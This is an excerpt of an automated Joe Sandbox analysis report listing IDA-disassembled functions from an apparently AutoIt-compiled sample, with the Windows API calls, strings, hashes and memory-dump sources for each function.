                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: '
                                                                        • API String ID: 3850602802-1997036262
                                                                        • Opcode ID: 2c9b2f191ed953ee95b970465111a7739254699e489f1c9154d01a9f0d0dc5fc
                                                                        • Instruction ID: a799733486e44eec57b65041fea8fd61d7c78686e755a2a53957771f5a26506e
                                                                        • Opcode Fuzzy Hash: 2c9b2f191ed953ee95b970465111a7739254699e489f1c9154d01a9f0d0dc5fc
                                                                        • Instruction Fuzzy Hash: 03411974A01309DFDB54CF68C881BDA7BF9FB09300F1085AAEA45AB342D771A951CF90
                                                                        Function 01052C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 01052C6A
                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 01052CA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CrackInternet_memset
                                                                        • String ID: |
                                                                        • API String ID: 1413715105-2343686810
                                                                        • Opcode ID: b327a664fcc13f757cba00425d1c4ae24274078f099e2aea63a7ca16ecfb9d33
                                                                        • Instruction ID: 586630e0007d9b6f91387fca15566cdb6d969809ee57d4ccb0d926113fe133fc
                                                                        • Opcode Fuzzy Hash: b327a664fcc13f757cba00425d1c4ae24274078f099e2aea63a7ca16ecfb9d33
                                                                        • Instruction Fuzzy Hash: 31311571C00219EBDF51EFA4CC85EEEBFB9FF18300F000059F915A6262EA359956DBA0
                                                                        Function 01067088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,?,?,?), ref: 0106713C
                                                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01067178
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$DestroyMove
                                                                        • String ID: static
                                                                        • API String ID: 2139405536-2160076837
                                                                        • Opcode ID: 1d1480b1f03418362d9e989881ab700aabcad7c1130c30b7db4f66a47ce9b368
                                                                        • Instruction ID: 57a9ba43ae5b6a30dc738724a58d5e31abb26b0678a294054adcc50c6bbc7cde
                                                                        • Opcode Fuzzy Hash: 1d1480b1f03418362d9e989881ab700aabcad7c1130c30b7db4f66a47ce9b368
                                                                        • Instruction Fuzzy Hash: 2C314D71100604EAEB619F68CC80AFB77EDFF88724F10961AF995D7191DA35A881D760
                                                                        Function 01043049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010430B8
                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 010430F3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: 41a58659404fba384d781fce0ac719097a1cf2aee2e436bc287b40f9ac30258a
                                                                        • Instruction ID: 0d99abc0673f1e13fc30ec597a64f600e0535bca1cba819ec6e2a0d6bfbea633
                                                                        • Opcode Fuzzy Hash: 41a58659404fba384d781fce0ac719097a1cf2aee2e436bc287b40f9ac30258a
                                                                        • Instruction Fuzzy Hash: B531E1B1A00215ABFB658E58C8C5FAEBFF8FB15340F1450A9EAC1AA1A0D7709640CB50
                                                                        Function 010540B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __snwprintf.LIBCMT ref: 01054132
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __snwprintf_memmove
                                                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                                                        • API String ID: 3506404897-2584243854
                                                                        • Opcode ID: b2ace045cff4677f98baa807c381862d608e47ecdb2e7c958bc4e8a461dc20c1
                                                                        • Instruction ID: ad633b43eb13498c95c028b0def1bf2f05bc216849c224d55bdc4734a53cc738
                                                                        • Opcode Fuzzy Hash: b2ace045cff4677f98baa807c381862d608e47ecdb2e7c958bc4e8a461dc20c1
                                                                        • Instruction Fuzzy Hash: 6B218B30A0021DABCF14EE65CC91AEE7BB5AF54340F000058EA85AB241EA74AA45EBA5
                                                                        Function 01066CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01066D86
                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01066D91
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: Combobox
                                                                        • API String ID: 3850602802-2096851135
                                                                        • Opcode ID: 8e21fbd6187eaea6f779949798e2aceee7fc4b2f61122d8c76ad872c6b2a50fe
                                                                        • Instruction ID: 22dac02357ffaceea672a3ed8a03797ef03b6bd15874923a112562566fb929c9
                                                                        • Opcode Fuzzy Hash: 8e21fbd6187eaea6f779949798e2aceee7fc4b2f61122d8c76ad872c6b2a50fe
                                                                        • Instruction Fuzzy Hash: CA11C871B002087FEF629E58DC90EFB3BAEEB94364F104125F9549B291D6369C908760
                                                                        Function 0106722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FE2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FE214F
                                                                          • Part of subcall function 00FE2111: GetStockObject.GDI32(00000011), ref: 00FE2163
                                                                          • Part of subcall function 00FE2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FE216D
                                                                        • GetWindowRect.USER32(00000000,?), ref: 01067296
                                                                        • GetSysColor.USER32(00000012), ref: 010672B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                        • String ID: static
                                                                        • API String ID: 1983116058-2160076837
                                                                        • Opcode ID: b5aaab0652da0964036ab44ee21f4acefcaf2faef832497759833120f21a95f4
                                                                        • Instruction ID: e4b6be3580fa1e7cfc1ee11aa2b4f06c54b13944b18e837e6d267120f726f5c3
                                                                        • Opcode Fuzzy Hash: b5aaab0652da0964036ab44ee21f4acefcaf2faef832497759833120f21a95f4
                                                                        • Instruction Fuzzy Hash: 23211472A1020AAFDB55DFA8CC45AEA7BA8FB08314F004659FD95E3240E635A8519B60
                                                                        Function 01066F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 01066FC7
                                                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 01066FD6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LengthMessageSendTextWindow
                                                                        • String ID: edit
                                                                        • API String ID: 2978978980-2167791130
                                                                        • Opcode ID: 2694b62a581287e2b4f809d5d2259154d9610c620b519f33938c32478497b45b
                                                                        • Instruction ID: 87a01ce82e494130f01491cd4dc7c8a2108e80715d42111ae02712a01154a011
                                                                        • Opcode Fuzzy Hash: 2694b62a581287e2b4f809d5d2259154d9610c620b519f33938c32478497b45b
                                                                        • Instruction Fuzzy Hash: D2116A71500209ABEB519F68EC80EEB3BAEEB05368F904754F9A5D71E4C637DC509B60
                                                                        Function 01043156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 010431C9
                                                                        • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 010431E8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu_memset
                                                                        • String ID: 0
                                                                        • API String ID: 2223754486-4108050209
                                                                        • Opcode ID: da642e1fc230fe8f4bb186dc155d45b05a8a2d5fed96f4ac205422af7b05b2a7
                                                                        • Instruction ID: 5408aa902abe13ce17699c1d7655f6d16fd64c0309c7af1cfaef639e45be2fdb
                                                                        • Opcode Fuzzy Hash: da642e1fc230fe8f4bb186dc155d45b05a8a2d5fed96f4ac205422af7b05b2a7
                                                                        • Instruction Fuzzy Hash: 7B113BB1901135ABEB20DA9CDCC5B9D7BF8BB05210F0451B2EAC1AF1A0D775EA04CB90
                                                                        Function 010528A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 010528F8
                                                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 01052921
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$OpenOption
                                                                        • String ID: <local>
                                                                        • API String ID: 942729171-4266983199
                                                                        • Opcode ID: 502701e8c68e1dac661560ec0350fa018dd06d515dbbf1b0327d66529e3e84e9
                                                                        • Instruction ID: 68cd4a8d747b119880490070f485ec609f30d148e7a42c69b8b66f0590554303
                                                                        • Opcode Fuzzy Hash: 502701e8c68e1dac661560ec0350fa018dd06d515dbbf1b0327d66529e3e84e9
                                                                        • Instruction Fuzzy Hash: 1611A370902226FAEBA58F958C89EBBFFACFF06651F00826AF98556140E3705854D6F0
                                                                        Function 01058475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 010586E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0105849D,?,00000000,?,?), ref: 010586F7
                                                                        • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010584A0
                                                                        • htons.WSOCK32(00000000,?,00000000), ref: 010584DD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWidehtonsinet_addr
                                                                        • String ID: 255.255.255.255
                                                                        • API String ID: 2496851823-2422070025
                                                                        • Opcode ID: 7a4e952645ea8282a2cb899024b2804726983c4c615e417da110f04f9843109f
                                                                        • Instruction ID: 602084b5d738502d5a49f9e06aaaff8839b34a4de257ce33fe70db6871ef8194
                                                                        • Opcode Fuzzy Hash: 7a4e952645ea8282a2cb899024b2804726983c4c615e417da110f04f9843109f
                                                                        • Instruction Fuzzy Hash: C511C23560020AABDB20EF64C842FFFB768FF04320F10855BEE9197291DB71A800CB55
                                                                        Function 010399BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 01039A2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 6d753f872c76942b9ad21068a43bd7854651f8999202c1592dcf772ec6ece83d
                                                                        • Instruction ID: b3a9d836081059bd11aef4b925bbf8b154eb0865f9731164fda4bb6b8f9bf2b1
                                                                        • Opcode Fuzzy Hash: 6d753f872c76942b9ad21068a43bd7854651f8999202c1592dcf772ec6ece83d
                                                                        • Instruction Fuzzy Hash: 0601F571A41128EB8F14EBA4CC51CFE776DFF56320B000709F9E2672D0DB3558089650
                                                                        Function 0104934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        • Opcode ID: 8b321290027181d8fa72deb5b70627f24320e457c7956f085e9b5eca9d56d98e
                                                                        • Instruction ID: ac6db4cb9af8ce503751e306c55b27d8e5b76d0a01959c064c6174123709ff55
                                                                        • Opcode Fuzzy Hash: 8b321290027181d8fa72deb5b70627f24320e457c7956f085e9b5eca9d56d98e
                                                                        • Instruction Fuzzy Hash: D701B9B29042587EEB19C6A8CC59EFE7BF89B15211F0041AEF592D61C1E5B5E6088B60
                                                                        Function 010398B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 01039923
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: e190a776556f4817ddefc929092fb246d48886fd7e757490c7511ce47d99762e
                                                                        • Instruction ID: 8a11a4ebb530e954862293892c70d8a2c90dad06be56a17516f904af7fcb559b
                                                                        • Opcode Fuzzy Hash: e190a776556f4817ddefc929092fb246d48886fd7e757490c7511ce47d99762e
                                                                        • Instruction Fuzzy Hash: 74014772F41009ABCB14EBA4CC61EFF73ACEF51300F000019B9C273290DA144E08A6B0
                                                                        Function 0103993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF1A36: _memmove.LIBCMT ref: 00FF1A77
                                                                          • Part of subcall function 0103B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0103B7BD
                                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 010399A6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassMessageNameSend_memmove
                                                                        • String ID: ComboBox$ListBox
                                                                        • API String ID: 372448540-1403004172
                                                                        • Opcode ID: 5cc335dfb14fbd021b26db833b438922770cfc0fed68eec50a1a55a5afddc9e8
                                                                        • Instruction ID: 832195217202930c68dbca7c5eb8797a3787794cf4509c7c5f3fd025783ba860
                                                                        • Opcode Fuzzy Hash: 5cc335dfb14fbd021b26db833b438922770cfc0fed68eec50a1a55a5afddc9e8
                                                                        • Instruction Fuzzy Hash: EF01DB72F41119A7DF10EBA8CD11EFF77ACAF55340F140116B9C573291DA694E089671
                                                                        Function 010454E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName_wcscmp
                                                                        • String ID: #32770
                                                                        • API String ID: 2292705959-463685578
                                                                        • Opcode ID: e38de1869adaf550b38406beb541d3458ef1fa4a9cba763b51a39716eccc796a
                                                                        • Instruction ID: c519800c9cf9757601467c583473eee4ffc8d9b649541987bda1fce1e4456677
                                                                        • Opcode Fuzzy Hash: e38de1869adaf550b38406beb541d3458ef1fa4a9cba763b51a39716eccc796a
                                                                        • Instruction Fuzzy Hash: A0E061329042291BD730A55DAC49FA7F7ECFB05731F000157FC84D7041D5609500C7D0
                                                                        Function 01038892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 010388A0
                                                                          • Part of subcall function 01003588: _doexit.LIBCMT ref: 01003592
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Message_doexit
                                                                        • String ID: AutoIt$Error allocating memory.
                                                                        • API String ID: 1993061046-4017498283
                                                                        • Opcode ID: 8b3125156cf69e325139da72f5ae0f0a373b891da01559c14f18e0e1ec263ca8
